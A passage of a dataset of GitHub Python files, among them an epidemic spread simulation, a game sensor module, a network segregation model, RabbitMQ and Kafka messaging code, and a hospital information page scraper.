state=2):\n \"\"\"随机挑选人设置状态\n \"\"\"\n assert self.count > num\n # TODO:极端情况下会出现无限循环\n n = 0\n while n < num:\n i = np.random.randint(0, self.count)\n if self._status[i] == state:\n continue\n else:\n self.set_state(i, state)\n n += 1\n\n def set_state(self, i, state):\n self._status[i] = state\n # 记录状态改变的时间\n self._timer[i] = self._round\n\n def random_movement(self, width=1):\n \"\"\"随机生成移动距离\n\n :param width: 控制距离范围\n :return:\n \"\"\"\n return np.random.normal(0, width, (self.count, 2))\n\n def random_switch(self, x=0.):\n \"\"\"随机生成开关,0 - 关,1 - 开\n\n x 大致取值范围 -1.99 - 1.99;\n 对应正态分布的概率, 取值 0 的时候对应概率是 50%\n :param x: 控制开关比例\n :return:\n \"\"\"\n normal = np.random.normal(0, 1, self.count)\n switch = np.where(normal < x, 1, 0)\n return switch\n\n @property\n def healthy(self):\n return self._people[self._status == 0]\n\n @property\n def infected(self):\n return self._people[self._status == 2]\n\n @property\n def cured(self):\n return self._people[self._status == 3]\n\n @property\n def dead(self):\n return self._people[self._status == 4]\n\n @property\n def suscept(self):\n return self._people[self._status == 1]\n\n def move(self, width=1, x=.0):\n movement = self.random_movement(width=width)\n # 限定特定状态的人员移动\n switch = self.random_switch(x=x)\n # movement[(self._status == 0) | switch == 0] = 0\n movement[(self._status == 3) |switch == 0] = 0\n self._people = self._people + movement\n\n def change_state(self):\n dt = self._round - self._timer\n # 必须先更新时钟再更新状态\n d = np.random.randint(5, 14)\n x = np.random.random(1)\n self._timer[(self._status == 2) & ((dt == d) | (dt > 14)) & (x<0.95)] = self._round\n self._status[(self._status == 2) & ((dt == d) | (dt > 14)) & (x<0.95)] += 1 #95%的人阳后5-14天痊愈\n\n\n\n def affect(self):\n # self.infect_nearest()\n self.susceptibility(rate=self.suscept_rate,time=self.suscept_time)\n self.infect_possible(rate=0.,safe_distance=self.safe_distance,R0=self.R0)\n self.dead_possible(rate=self.death_rate)\n\n\n def infect_nearest(self, safe_distance=3.0):\n \"\"\"感染最接近的健康人\"\"\"\n for inf in self.infected:\n dm = (self._people - inf) ** 2\n d = dm.sum(axis=1) ** 0.5\n sorted_index = d.argsort()\n for i in sorted_index:\n if d[i] >= safe_distance:\n break # 超出范围,不用管了\n if self._status[i] > 0:\n continue\n self._status[i] = 2\n # 记录状态改变的时间\n self._timer[i] = self._round\n break # 只传 1 个\n\n def infect_possible(self, rate=0., safe_distance=3.0, R0=3):\n \"\"\"按概率感染接近的健康人\n rate 的取值参考正态分布概率表,rate=0 时感染概率是 50%\n R0是传染人数,默认R0为3\n \"\"\"\n count=0\n for inf in self.infected:\n dm = (self._people - inf) ** 2\n # d = dm.sum(axis=1) ** 0.5\n d = dm.sum(axis=1) ** 0.5\n sorted_index = d.argsort()\n for i in sorted_index:\n if d[i] >= safe_distance:\n break # 超出范围,不用管了\n if self._status[i] >1 :\n continue\n if np.random.normal() > rate:\n continue\n self._status[i] = 2\n # 记录状态改变的时间\n self._timer[i] = self._round\n count+=1\n if count>=R0:\n break\n\n def susceptibility(self, rate=0.4,time=60):\n \"\"\"40%的人在60天后恢复易感\n x 的取值为易感率\n \"\"\"\n list=np.where(self._status == 3)\n list=list[0].tolist()\n for i in list:\n dt = self._round - self._timer[i]\n # 必须先更新时钟再更新状态\n # 痊愈情况\n if dt>time:# 痊愈者60天后易感\n # self._status[i] = 0\n # self._timer[i] = self._round\n # else:\n # continue\n #设置一个随机数\n n = np.random.random(1)\n if n < rate:\n continue\n else:\n self._timer[i] = self._round\n self._status[i] = 0 # 痊愈者60天后易感\n\n def dead_possible(self, rate=0.001):\n \"\"\"参考死亡率为千分之1\n x 的取值为死亡率\n \"\"\"\n list=np.where(self._status == 2)\n list=list[0].tolist()\n for i in list:\n #确诊的死亡\n #设置一个随机数\n n = np.random.random(1)\n if n > rate:\n continue\n else:\n self._status[i] = 4\n self._timer[i] = self._round\n\n\n def over(self):\n return len(self.healthy) == 0\n\n def report(self):\n #保存图像\n plt.cla()\n # plt.grid(False)\n p1 = plt.scatter(self.healthy[:, 0], self.healthy[:, 1], s=1, c='green')\n p2 = plt.scatter(self.infected[:, 0], self.infected[:, 1], s=1, c='red')\n p3 = plt.scatter(self.cured[:, 0], self.cured[:, 1], s=1, c='blue')\n p4 = plt.scatter(self.dead[:, 0], self.dead[:, 1], s=1, c='black')\n p5 = plt.scatter(self.suscept[:, 0], self.suscept[:, 1], s=1, c='aqua')\n\n plt.legend([p1, p2, p3, p4], ['healthy', 'infected', 'cured', 'death'], loc='upper right', scatterpoints=1)\n t = \"Round: %s, Healthy: %s, Infected: %s, Cured: %s, Death: %s\" % \\\n (self._round, len(self.healthy), len(self.infected), len(self.cured), len(self.dead))\n plt.text(-700, 1000, t, fontsize=20, ha='left', wrap=True)\n savename=\"./save/Round_%s.jpg\" % (self._round)\n plt.savefig(savename)\n plt.clf()\n #保存列表\n self.round.append(self._round)\n self.health.append(len(self.healthy))\n self.infector.append(len(self.infected))\n self.recovery.append(len(self.cured))\n self.death.append(len(self.dead))\n\n\n def update(self):\n \"\"\"每一次迭代更新\"\"\"\n self.change_state()\n self.affect()\n self.move(width=self.move_width, x=0.66) # x函数为高斯分布,随机大约25%的人不移动\n self._round += 1\n self.report()\n print('Round_%s' % self._round)\n\n def save_result(self):\n \"\"\"保存数据\"\"\"\n save_excl(round=self.round,health=self.health,infector=self.infector,cured=self.recovery,death=self.death)\n fig_result=plt.figure(figsize=(20, 20), dpi=100)\n plt.plot(self.round,self.health,'g-')\n plt.plot(self.round, self.infector, 'r-')\n plt.plot(self.round, self.recovery, 'b-')\n plt.plot(self.round, self.death, 'k-')\n plt.savefig(\"./save/results.jpg\")\n\nif __name__ == '__main__':\n np.random.seed(0)\n plt.figure(figsize=(20, 20), dpi=100)\n plt.ion()\n p = People(100000, 3)####这里填入初始人数,初始病人\n for i in range(365):\n p.update()\n p.save_result()\n","repo_name":"Roin626/virus_trans","sub_path":"virusdemo.py","file_name":"virusdemo.py","file_ext":"py","file_size_in_byte":9694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"361469397","text":"import math\nimport random\nimport re\n\nfrom CYLGame import GameLanguage\nfrom CYLGame.Frame import GameFrame\nfrom CYLGame.Game import NonGridGame\nfrom CYLGame.Player import Player\n\nTAU = 2.0 * math.pi\nSEP = \"---------------------------------------\"\n\nDEBUG = False\n\n\ndef dprint(string):\n if DEBUG:\n print(string)\n\n\ndef deg2rad(deg):\n return float(deg) * TAU / 360.0\n\n\ndef rad2deg(rad):\n return float(rad) * 360.0 / TAU\n\n\ndef rotate_point(angle, point):\n cos_ = math.cos(angle)\n sin_ = math.sin(angle)\n\n newp = [0, 0]\n newp[0] = float(point[0]) * cos_ - float(point[1]) * sin_\n newp[1] = float(point[0]) * sin_ + float(point[1]) * cos_\n\n return newp\n\n\ndef compute_vector(start, end, screen_width, screen_height):\n \"\"\"\n Computes the vector and distance between two objects, start and end.\n start and end must have a position attribute which is a list/tuple\n of the x and y coord.\n \"\"\"\n vector = []\n half_width = float(screen_width) / 2.0\n vector.append(end.position[0] - start.position[0])\n if vector[0] > half_width:\n vector[0] -= screen_width\n elif vector[0] < -half_width:\n vector[0] += screen_width\n\n half_height = float(screen_height) / 2.0\n vector.append(end.position[1] - start.position[1])\n if vector[1] > half_height:\n vector[1] -= screen_height\n elif vector[1] < -half_height:\n vector[1] += screen_height\n\n return vector[0] ** 2 + vector[1] ** 2, vector\n\n\nclass SensorSanitizers(object):\n # sensor sanitize/validate functions\n @staticmethod\n def san_range(r):\n if not r:\n return 0.0\n\n new_r = float(r)\n if new_r < 0.0:\n new_r = 0.0\n elif new_r > 100.0:\n new_r = 100.0\n return new_r\n\n @staticmethod\n def san_angle(a):\n if not a:\n return 0.0\n\n return float(a)\n\n @staticmethod\n def san_width(w):\n if not w:\n return 0.0\n\n new_w = float(w)\n if new_w < 0.0:\n new_w = 0.0\n elif new_w > 360.0:\n new_w = 360.0\n return new_w\n\n @staticmethod\n def san_turret(t):\n if not t:\n return False\n\n return bool(t)\n\n color_re = re.compile(r\"#[0-9A-Fa-f]{6}\")\n\n @staticmethod\n def san_color(c):\n if not c:\n return None\n elif SensorSanitizers.color_re.match(c):\n return c\n else:\n return None\n\n\nclass SensorPlayer(Player):\n def add_sensor(self, _range, angle, width, turret):\n \"\"\"\n Adds a sensor to this player.\n _range: integer [0, 100], the distance that the sensor travels\n angle: integer [0, 360], the direction in degrees the sensor points\n width: integer [0, 360], the width in degrees of the sensor\n turret: bool, if True, the angle is relative to the turret's angle,\n otherwise angle is relative to the tank's angle\n \"\"\"\n sensor = {}\n sensor[\"range\"] = float(_range)\n sensor[\"angle\"] = deg2rad(angle)\n sensor[\"width\"] = deg2rad(width)\n sensor[\"turret\"] = turret\n sensor[\"triggered\"] = 0\n self.sensors.append(sensor)\n\n def sensor_calc(self, other, dist_sq, vector, tank_sensor_range):\n \"\"\"\n See if other is in any of our sensors.\n \"\"\"\n if self.killer or other.killer:\n return\n\n # check if they are in our max sensor range\n if dist_sq > (tank_sensor_range + other.radius) ** 2:\n return\n # print(\"sensor_calc\")\n # print(dist_sq, vector, self.angle)\n # Now calculate sensors\n for i, sensor in enumerate(self.sensors):\n if sensor[\"range\"] <= 0:\n continue\n\n if sensor[\"triggered\"] & other.obj_type:\n # sensor already firing\n continue\n\n if dist_sq > (sensor[\"range\"] + other.radius) ** 2:\n # out of range\n continue\n\n theta = self.angle + sensor[\"angle\"]\n # print(sensor[\"angle\"])\n if sensor[\"turret\"]:\n theta += self.turret_current\n\n # do some funky math\n # rotate other's position by theta\n rotated_point = rotate_point(-theta, vector)\n # Sensor is symmetrical, so we only need to consider top\n # quadrants\n rotated_point[1] = abs(rotated_point[1])\n # compute inverse slope of our sensor\n m_s = 1.0 / math.tan(sensor[\"width\"] / 2.0)\n # compute slope to other\n m_r = rotated_point[0] / rotated_point[1]\n\n # if our inverse slope is less than other, they're inside\n # the arc\n if m_r >= m_s:\n # print(\"triggered\", i)\n sensor[\"triggered\"] |= other.obj_type\n continue\n\n # Now check if the edge of the arc intersects the tank. Do\n # this just like with firing\n rotated_point = rotate_point(sensor[\"width\"] / -2.0, rotated_point)\n if rotated_point[0] > 0 and abs(rotated_point[1]) < other.radius:\n # print(\"triggered\", i)\n sensor[\"triggered\"] |= other.obj_type\n\n\nclass SensorGame(NonGridGame):\n WEBONLY = True\n NONGRID = True\n OPTIONS = \"sensors\"\n\n def do_sensors(self):\n players = self.players\n for player in players:\n for sensor in player.sensors:\n sensor[\"triggered\"] = 0\n\n for i in range(len(players)):\n if players[i].killer:\n continue\n\n for j in range(i + 1, len(players)):\n if players[j].killer:\n continue\n dist_sq, vector = compute_vector(players[i], players[j], self.SCREEN_WIDTH, self.SCREEN_HEIGHT)\n players[i].sensor_calc(players[j], dist_sq, vector, self.MAX_SENSOR_RANGE)\n vector[0] = -vector[0]\n vector[1] = -vector[1]\n players[j].sensor_calc(players[i], dist_sq, vector, self.MAX_SENSOR_RANGE)\n","repo_name":"UMDLARS/CYLGame","sub_path":"CYLGame/SensorGame.py","file_name":"SensorGame.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"40607170021","text":"import numpy as np\n# k -> init_energy\nn ,k = map(int, input().split(' '))\n\nfriuts = [] #[[bi],[ai]] -> [- , +]\nfor i in range(n):\n data = list(map(int, input().split(' ')))\n friuts.append(data)\n\nefficient_friuts_= np.array(list(filter(lambda x : x[0] < x[1], friuts)))\nsorted_efficient_friuts = efficient_friuts_[np.argsort(efficient_friuts_[:, 0])]\n\nresults = []\ninit_energy = k\nfor f in sorted_efficient_friuts:\n if init_energy - f[0] >= 0:\n results.append(list(f))\n init_energy += abs(f[1]-f[0]) # abs is not necessary in here\n\n\nresult_friuts = list(map(lambda x : abs(x[0] - x[1]), results))\n\nprint(k + sum(result_friuts))","repo_name":"ParsaAminpour/Quera-Algorithm-Course-Solutions","sub_path":"Quera-advanced-algorithm-course/Season5/Solutions/SolutionNo3.py","file_name":"SolutionNo3.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73244383120","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 10 14:01:21 2020\n@author: Jakob\n\"\"\"\n\n###########################################################\n### Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport networkx as nx\nimport time \nfrom multiprocessing import Pool\n\n\n### Global parameter inputs\n\nn = 6 # Number of agents\ndelta = 0.3 # weight placed on indirect links\ngamma = 0.5 # weight placed on additional utility derived from a mutual link\nc = 0.15 # cost of forming and maintaining links\nb = 0.7 # strength of preference for links to similar agents\nsigma = 0.01 # standard deviation of the shocks to utility\nalpha = 2 # convexity of costs (cost=c*d_i**alpha)\np_link_0 = 0.25 # Uniform initial link probability (to generate g_0)\n\n# shares of the types\nshare_red = 1/3\nshare_blue = 1/3\nshare_green = 1 - share_red - share_blue\npossible_X = [1,2,3] # coding of the types\n\n# Simulation parameters\nT = 5000 # Maximum iterations\nt_plot = 1 # periods between plots\nt_conv = 10 # if g does not change for t_conv periods we have reached convergence\n\n### Functions\n\ndef u(i, j, X) :\n \"\"\" Returns the partial utility given X_i and X_j using the exp(-b*L1-norm\n of their difference)\"\"\"\n return math.exp(-b * np.linalg.norm((X[i] - X[j]), ord=1))\n\n\ndef U(i, g, X) :\n \"\"\" Returns the full utility of agent i given the current network structure\n g and the matrix of characteristics X \"\"\"\n d_i = sum(g[i]) # degree of i\n\n direct_u = sum([g[i, j] * u(i, j, X) for j in range(n)])\n\n mutual_u = sum([g[i, j] * g[j, i] * u(i, j, X) for j in range(n)])\n\n indirect_u = 0\n for j in range(n) :\n for k in range(n) :\n if k == i or k == j :\n continue\n else :\n indirect_u += g[i, j] * g[j, k] * u(i, k, X)\n\n return direct_u + gamma * mutual_u + delta * indirect_u - d_i ** alpha * c\n\n\ndef step(g, X) :\n \"\"\" Randomly selects an agent i to revise their link with another random\n agent j. Returns the updated adjacency matrix and link revision tuple (i,j)\n as well as the outcome of the revision \"\"\"\n i,j = np.random.choice(range(n), size=2, replace=False)\n g_ij_initial = g[i,j]\n\n eps = np.random.normal(scale=sigma, size=2) # Simulate two shocks from normal with std dev sigma\n\n g[i,j] = 1\n U_with_link = U(i,g,X) + eps[0]\n \n g[i,j] = 0\n U_without_link = U(i,g,X) + eps[1]\n \n if U_with_link > U_without_link :\n g[i,j] = 1\n \n if U_with_link == U_without_link :\n g[i,j] = g_ij_initial\n \n if U_with_link < U_without_link :\n g[i,j] = 0\n \n formed = 0\n if g[i,j] > g_ij_initial:\n formed = 1\n if g[i,j] < g_ij_initial:\n formed = 2\n \n return g, (i,j), formed\n\n\ndef analyse(connectivity, characteristics):\n \"\"\"\n Calculate mean and standard deviation (output in tuples [mean,sd]) of \n the following network measures:\n \n - degree\n - mut_prop\n - cluster_coef\n - segreg_ind > list with length of the amount of characteristics (3 for sex, race, grade)\n \n INPUT: \n - connectivity matrix with row-students nominating column-students as friends\n - characteristics matrix with row per student, with integers indicating every group for each characteristic (sex, race, grade)\n \"\"\"\n \n # get amount of nodes and list of out going dyads for every individual\n nodes = connectivity.shape[0]\n out_d = np.count_nonzero(connectivity, axis=1)\n \n \n # determine degree nodes (outgoing connections)\n mean_degree = np.mean(out_d)\n std_degree = np.std(out_d)\n degree = [mean_degree, std_degree]\n\n \n # determine the mutual dyads proportion\n # create matrix with 2's on mutual dyads, 1's on asymmetric dyads and count occurrence\n added_up = connectivity + np.transpose(connectivity)\n mutual_d = np.count_nonzero(added_up == 2, axis=1)\n mut_prop = mutual_d / out_d\n # remove 'nan' individuals (with no out-going connections) from list\n mut_prop = [value for value in mut_prop if not math.isnan(value)]\n # calculate mean+std mutual dyads proportion\n mean_mut_prop = np.mean(mut_prop)\n std_mut_prop = np.std(mut_prop)\n mut_prop = [mean_mut_prop, std_mut_prop]\n \n \n # determine the local clustering coefficient\n clustering_coefficients = []\n for n_node, connections in enumerate(connectivity):\n # the amount of neighbours each node has\n n_neighbours = np.sum(connectivity[n_node])\n # only consider nodes with at least 2 neighbours\n if n_neighbours >= 2:\n # matrix of the nodes that are both neighbours of the node considered\n neighbour_matrix = np.dot(np.transpose([connectivity[n_node]]),[connectivity[n_node]])\n # the amount of connections between neighbours\n neighbour_connections = np.sum(connectivity*neighbour_matrix)\n # the amount of connections between neighbours divided by the possible amount of connections\n clustering_coefficients.append(neighbour_connections / (n_neighbours*(n_neighbours-1)))\n # calculate mean+std clustering coefficient\n mean_cluster_coef = np.mean(clustering_coefficients)\n std_cluster_coef = np.std(clustering_coefficients)\n cluster_coef = [mean_cluster_coef, std_cluster_coef]\n\n \n # determine the segregation index per characteristic (sex, race, grade)\n segreg_ind = []\n # iterate through different characteristics (sex, race, grade)\n for i in range(characteristics.shape[1]):\n # get different groups of this characteristic in dataset\n characs = sorted(list(set(characteristics[:,i])))\n amount = len(characs)\n # for every characteristic own tuple for mean and std\n segreg_ind_charac = []\n # iterate through different groups of this characteristic\n for j in range(amount):\n # indicate indices of members this group and save size group\n indices = np.where(characteristics[:,i] == characs[j])[0]\n # calculate ratio out-group individuals\n ratio_diff = 1 - len(indices) / nodes\n # create a submatrix of all nominations from this group and save amount\n submat_trait = connectivity[np.ix_(indices,)]\n # create submatrix outgoing connections to individuals different group\n mask = np.ones(connectivity.shape[0], np.bool)\n mask[indices] = 0\n submat_diff = submat_trait[:,mask]\n # calculate segregation index per individual of this group for this characteristic\n for ind in range(len(indices)):\n expect_out = submat_trait[ind].sum() * ratio_diff\n observ_out = submat_diff[ind].sum()\n seg_ind = (expect_out - observ_out) / expect_out\n if seg_ind < -1:\n seg_ind = -1\n segreg_ind_charac.append(seg_ind)\n # remove 'nan' individuals from list\n segreg_ind_charac = [value for value in segreg_ind_charac if not math.isnan(value)]\n # calculate mean+std segregation index this characteristic\n mean_segreg_ind_charac = np.mean(segreg_ind_charac)\n std_segreg_ind_charac = np.std(segreg_ind_charac)\n segreg_ind.append([mean_segreg_ind_charac, std_segreg_ind_charac])\n \n return degree, mut_prop, cluster_coef, segreg_ind[0]\n\n\ndef nx_graph(g):\n ''' Returns an nx graph for an adjacency matrix g '''\n rows, cols = np.where(g == 1)\n edges = zip(rows.tolist(), cols.tolist())\n gr = nx.DiGraph() # Calling the DIRECTED graph method\n gr.add_nodes_from(range(len(g)))\n gr.add_edges_from(edges)\n\n return gr\n\n\ndef plot_network(g,ij=None,formed=None,node_positions=None,ax=None) :\n \"\"\" Uses nx to plot the directed network g \"\"\"\n gr = nx_graph(g)\n # Add node colors according to X\n color_map = []\n for i in range(n) :\n if X[i,0] == possible_X[0]:\n color_map.append('red')\n if X[i,0] == possible_X[1]:\n color_map.append('blue')\n if X[i,0] == possible_X[2]:\n color_map.append('green')\n# pos = nx.spring_layout(gr)\n pos = nx.circular_layout(gr)\n nx.draw(gr, pos, node_color=color_map, with_labels=True, node_size=300, \n arrowsize=20, ax=ax)\n \n if ij != None:\n if formed == 0:\n edge_color = 'b'\n if formed == 1:\n edge_color = 'g'\n if formed == 2:\n edge_color = 'r'\n \n nx.draw_networkx_edges(gr, pos, edgelist=[ij], edge_color=edge_color, \n arrowsize=20, width=3, ax=ax)\n\n\ndef plot_network_and_stats(g,X,stats_list,ij,formed,t,node_positions=None):\n ''' Plots the network and network statistics '''\n k = len(stats_list[0]) # number of network statistics\n\n fig = plt.figure(figsize=(15, 5))\n grid = plt.GridSpec(2, k, wspace=0.4, hspace=0.3)\n main_ax = fig.add_subplot(grid[0,:])\n small_axs = [fig.add_subplot(grid[1, i]) for i in range(k)]\n \n if ij == None:\n plot_network(g,node_positions=node_positions,ax=main_ax)\n else:\n plot_network(g,ij,formed,node_positions=node_positions,ax=main_ax)\n\n statistic_names = ['Avg. degree', 'Mutuality', 'Clustering', 'Segregation']\n\n for i in range(k):\n small_axs[i].plot(stats_list[0][i][0],'ro')\n small_axs[i].plot([stats[i][0] for stats in stats_list])\n small_axs[i].set_title(statistic_names[i])\n \n plt.suptitle('Network configuration at t={}'.format(t))\n# plt.savefig('toy_evolution' + str(t) + '.png') # save figures\n plt.show()\n\n### Simulation\n \n# Generate proportional green blue and reds\nX = np.zeros((n,2))\nX[:,0] = np.array([possible_X[0] for i in range(int(share_red * n))] +\n [possible_X[1] for i in range(int(share_blue * n))] +\n [possible_X[2] for i in range(n - int(share_red * n) - int(share_blue * n))])\n\n# Randomly generate the initial network configuration\ng_0 = np.random.choice([0, 1], size=(n, n), p=[1 - p_link_0, p_link_0])\nnp.fill_diagonal(g_0, 0) # The diagonal elements of the adjacency matrix are 0 by convention\ng_sequence = [g_0] # Sequence of adjacency matrices\n\n# Initialize lists to save results \nstats_list = [analyse(g_sequence[-1],X)]\nij_list = [None]\nformed_list = [None]\n\n\nfor t in range(T - 1):\n # Perform a step and append the new network\n g_new, ij, formed = step(g_sequence[-1], X)\n g_sequence.append(g_new.copy())\n ij_list.append(ij)\n formed_list.append(formed)\n \n # Analyze new network\n stats = analyse(g_sequence[-1],X)\n stats_list.append(stats)\n \n if t % t_conv == 0 and t // t_conv > 0:\n # Calculate how many links have changed and stop if convergence has been reached\n network_change = np.linalg.norm((g_sequence[-1] - g_sequence[-t_conv]), ord=1)\n if network_change == 0:\n convergence_steps = t\n break\n \nfor t in range(len(g_sequence)-1):\n # Produce a plot and diagnostics every t_plot steps\n if t % t_plot == 0:\n plot_network_and_stats(g_sequence[t],X,stats_list[:t+1],ij_list[t+1],formed_list[t+1],t)\n\n# Plot final network\nplot_network_and_stats(g_sequence[-1],X,stats_list,None,None,len(g_sequence))\n\n \nprint('It took {} setps until convergence'.format(convergence_steps))\n","repo_name":"jakob-ra/Network_Segregation","sub_path":"toy_model.py","file_name":"toy_model.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19887485464","text":"\n\nimport os\n\nimport time\n\npath = \"C:\\\\Users\\\\dogma\\\\OneDrive\\\\Desktop\\\\HTML Documents\\\\The-Tech-Academy-Basic-Python-Projects\\\\A\\\\\"\n\ndirs = os.listdir(path)\n\nfor file in dirs:\n if file.endswith(\".txt\"):\n txt_files = os.path.join(path,file)\n mTime = time.localtime(os.path.getmtime(path))\n fTime = time.strftime(\"%m/%d/%Y, %H:%M:%S\", mTime)\n print(\"File Name:\", txt_files,\"Modified:\", fTime)\n\n","repo_name":"austinreeves/The-Tech-Academy-Python-Coding-Projects","sub_path":"PythonDrill.py","file_name":"PythonDrill.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33922436638","text":"import logging\nimport pika\n\nfrom cloudbrain.subscribers.interface import SubscriberInterface\nfrom cloudbrain.core.config import get_config\nfrom cloudbrain.core.auth import CloudbrainAuth\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass PikaSubscriber(SubscriberInterface):\n def __init__(self,\n base_routing_key,\n rabbitmq_user,\n rabbitmq_pwd):\n\n super(PikaSubscriber, self).__init__(base_routing_key)\n _LOGGER.debug(\"Base routing key: %s\" % self.base_routing_key)\n _LOGGER.debug(\"Routing keys: %s\" % self.routing_keys)\n _LOGGER.debug(\"Metric buffers: %s\" % self.metric_buffers)\n\n self.rabbitmq_user = rabbitmq_user\n self.rabbitmq_pwd = rabbitmq_pwd\n\n self.connection = None\n self.channels = {}\n self.config = get_config()\n self.rabbitmq_address = self.config['rabbitHost']\n self.auth = CloudbrainAuth(self.config['authUrl'])\n self.rabbitmq_vhost = self.auth.get_vhost(rabbitmq_user, rabbitmq_pwd)\n\n def connect(self):\n credentials = pika.PlainCredentials(self.rabbitmq_user,\n self.rabbitmq_pwd)\n\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(\n host=self.rabbitmq_address,\n virtual_host=self.rabbitmq_vhost,\n credentials=credentials))\n\n def register(self, metric_name, num_channels, buffer_size=1):\n\n routing_key = \"%s:%s\" % (self.base_routing_key, metric_name)\n self.register_metric(routing_key,\n metric_name,\n num_channels,\n buffer_size)\n self._rabbitmq_register(routing_key)\n\n def _rabbitmq_register(self, routing_key):\n channel = self.connection.channel()\n channel.exchange_declare(exchange=routing_key, exchange_type='direct')\n\n queue_name = channel.queue_declare(exclusive=True).method.queue\n channel.queue_bind(exchange=routing_key,\n queue=queue_name,\n routing_key=routing_key)\n\n self.channels[routing_key] = {'channel': channel,\n 'queue_name': queue_name}\n\n def disconnect(self):\n for channel in self.channels.values():\n if channel:\n channel['channel'].stop_consuming()\n channel['channel'].close()\n self.connection.close()\n\n def subscribe(self, metric_name, callback):\n\n routing_key = '%s:%s' % (self.base_routing_key, metric_name)\n self._rabbitmq_subscribe(routing_key, callback)\n\n def _rabbitmq_subscribe(self, routing_key, callback):\n channel = self.channels[routing_key]['channel']\n queue_name = self.channels[routing_key]['queue_name']\n\n channel.basic_consume(callback,\n queue=queue_name,\n exclusive=True,\n no_ack=True)\n\n channel.start_consuming()\n\n def get_one_message(self, metric_name):\n routing_key = '%s:%s' % (self.base_routing_key, metric_name)\n return self._rabbitmq_get_one_message(routing_key)\n\n def _rabbitmq_get_one_message(self, routing_key):\n channel = self.channels[routing_key]['channel']\n queue_name = self.channels[routing_key]['queue_name']\n meth_frame, header_frame, body = channel.basic_get(queue_name)\n\n return body\n","repo_name":"marionleborgne/cloudbrain","sub_path":"src/cloudbrain/subscribers/rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"3"} +{"seq_id":"3701723016","text":"from kafka import KafkaProducer\nimport random\nfrom time import sleep\nimport sys, os\n\nif __name__==\"__main__\":\n\n# if (len(sys.argv) < 4):\n# print(\"Usage: python 3-kafka_producer.py <low_thres> <high_thres> <topic_name> <data_filename>\")\n# print(\"Suggested: python 3-kafka_producer.py 0.4 0.9 test data/sample_new_users.csv\")\n\n try:\n print(\"Initialization...\")\n producer = KafkaProducer(bootstrap_servers='localhost:9092')\n \n print(\"Sending messages to kafka 'test' topic...\")\n# low = sys.argv[1]\n# high = sys.argv[2]\n# topic = sys.argv[3]\n# filename = sys.argv[4]\n \n f = open('data/occupancy_data.csv', 'rt')\n try:\n for line in f:\n print(line)\n producer.send('test', bytes(line, 'utf8'))\n sleep(random.uniform(float(0.6), float(1.3)))\n finally:\n f.close()\n \n print(\"Waiting to complete delivery...\")\n producer.flush()\n print(\"End\")\n\n except KeyboardInterrupt:\n print('Interrupted from keyboard, shutdown')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n","repo_name":"marinamashina/occupancy-detection-spark-streaming","sub_path":"2-kafka_producer.py","file_name":"2-kafka_producer.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12379313392","text":"import requests \nfrom bs4 import BeautifulSoup \nimport csv\nfrom csv import DictWriter \n \nURL = \"https://turquoise.health/providers/abbott-northwestern-hospital/information\"\nr = requests.get(URL) \nsoup = BeautifulSoup(r.content, 'html5lib')\nc = 0\nquotes=[]\nquote = {} \nfor row in soup.findAll('div', attrs = {'class':'hospital-all-detail'}): \n for j in row.findAll('ul'):\n for k in j.findAll('li'):\n # c = c + 1\n # print(\"count==> \",c)\n print(\"para \",k.p.text)\n if len(k.span) == 1:\n if k.p.text == 'Name':\n quote['Name'] = k.span.text\n\n\n elif k.p.text == 'ADDRESS':\n quote['ADDRESS'] = k.span.text\n \n \n elif k.p.text == 'Phone':\n quote['Phone'] = k.span.text\n\n \n elif k.p.text == 'MEDICARE PROVIDER ID':\n quote['MEDICARE PROVIDER ID'] = k.span.text\n \n elif k.p.text == 'NATIONAL PROVIDER ID (NPI)':\n quote['NATIONAL PROVIDER ID (NPI)'] =k.span.text\n \n elif k.p.text == 'PROVIDER TYPE':\n quote['PROVIDER TYPE'] = k.span.text\n \n elif k.p.text == 'OWNERSHIP':\n quote['OWNERSHIP'] = k.span.text\n \n elif k.p.text == 'BEDS':\n quote['BEDS'] = k.span.text\n \n else:\n # if c == 6:\n if k.p.text == 'WEBSITE':\n if k.span.a['href'] != \"\":\n quote['WEBSITE'] = k.span.a['href']\n\n elif k.p.text == 'HEALTH SYSTEM AFFILIATION':\n quote['HEALTH SYSTEM AFFILIATION'] = k.span.a['href']\n\n \n \n \n \n\nquotes.append(quote)\nprint(quotes)\ncolumnsName = ['Name','ADDRESS','Phone','MEDICARE PROVIDER ID','NATIONAL PROVIDER ID (NPI)','WEBSITE','PROVIDER TYPE','OWNERSHIP','BEDS','HEALTH SYSTEM AFFILIATION']\nfilename = 'hospital.csv'\n# with open(filename, 'w', newline='') as f: \n# w = csv.DictWriter(f,columnsName) \n# w.writeheader() \n# w.writerow(quotes[0])\n\n\n\nwith open(filename, 'a', newline='') as f_object:\n dictwriter_object = DictWriter(f_object, fieldnames = columnsName)\n dictwriter_object.writerow(quotes[0])\n \n ","repo_name":"shakeebanwar/Beautiful-Soap-Python","sub_path":"s.py","file_name":"s.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22984549623","text":"import time\nimport logging\n\nfrom poloniex import PublicAPI, PublicAPIError\nfrom .ticker import Ticker\n\nlogger = logging.getLogger(__name__)\n\n\nclass HttpDataCollector(PublicAPI):\n def __init__(self):\n PublicAPI.__init__(self)\n self.tickers = dict()\n self.last_update = 